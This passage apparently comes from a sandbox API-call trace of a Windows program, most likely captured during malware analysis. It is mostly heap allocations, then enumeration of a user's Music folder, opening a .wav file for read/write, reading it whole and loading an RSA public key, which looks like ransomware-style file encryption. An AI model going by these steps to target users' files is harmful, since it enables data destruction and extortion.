Size=0x60) returned 0x2a2f018 [0195.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.283] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\") returned="Eb_B9k_JDAVxhXh0\\" [0195.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae22a8 [0195.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.284] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0195.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae22a8 | out: hHeap=0x2c0000) returned 1 [0195.284] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.284] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.285] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.285] PathFindFileNameW (pszPath="") returned="" [0195.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.285] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\*" (normalized: "c:\\users\\keecfmwgj\\music\\eb_b9k_jdavxhxh0\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c950, ftCreationTime.dwHighDateTime=0x1d89a70, ftLastAccessTime.dwLowDateTime=0xcd597b10, ftLastAccessTime.dwHighDateTime=0x1d8a5a5, ftLastWriteTime.dwLowDateTime=0xcd597b10, ftLastWriteTime.dwHighDateTime=0x1d8a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0195.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.287] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c950, ftCreationTime.dwHighDateTime=0x1d89a70, ftLastAccessTime.dwLowDateTime=0xcd597b10, ftLastAccessTime.dwHighDateTime=0x1d8a5a5, ftLastWriteTime.dwLowDateTime=0xcd597b10, ftLastWriteTime.dwHighDateTime=0x1d8a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.287] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8a4e90, ftCreationTime.dwHighDateTime=0x1d89f8e, ftLastAccessTime.dwLowDateTime=0xc66ddad0, ftLastAccessTime.dwHighDateTime=0x1d8a6d6, ftLastWriteTime.dwLowDateTime=0xc66ddad0, ftLastWriteTime.dwHighDateTime=0x1d8a6d6, nFileSizeHigh=0x0, nFileSizeLow=0x19d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6X4EOyI76e.wav", cAlternateFileName="6X4EOY~1.WAV")) returned 1 [0195.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.287] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\6X4EOyI76e.wav") returned=".wav" [0195.287] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\6X4EOyI76e.wav" (normalized: "c:\\users\\keecfmwgj\\music\\eb_b9k_jdavxhxh0\\6x4eoyi76e.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.291] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=6614) returned 1 [0195.292] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.295] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x19b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.296] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.299] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.299] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x19d6, lpOverlapped=0x0) returned 1 [0195.299] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.300] lstrlenA (lpString="-----BEGIN PUBLIC 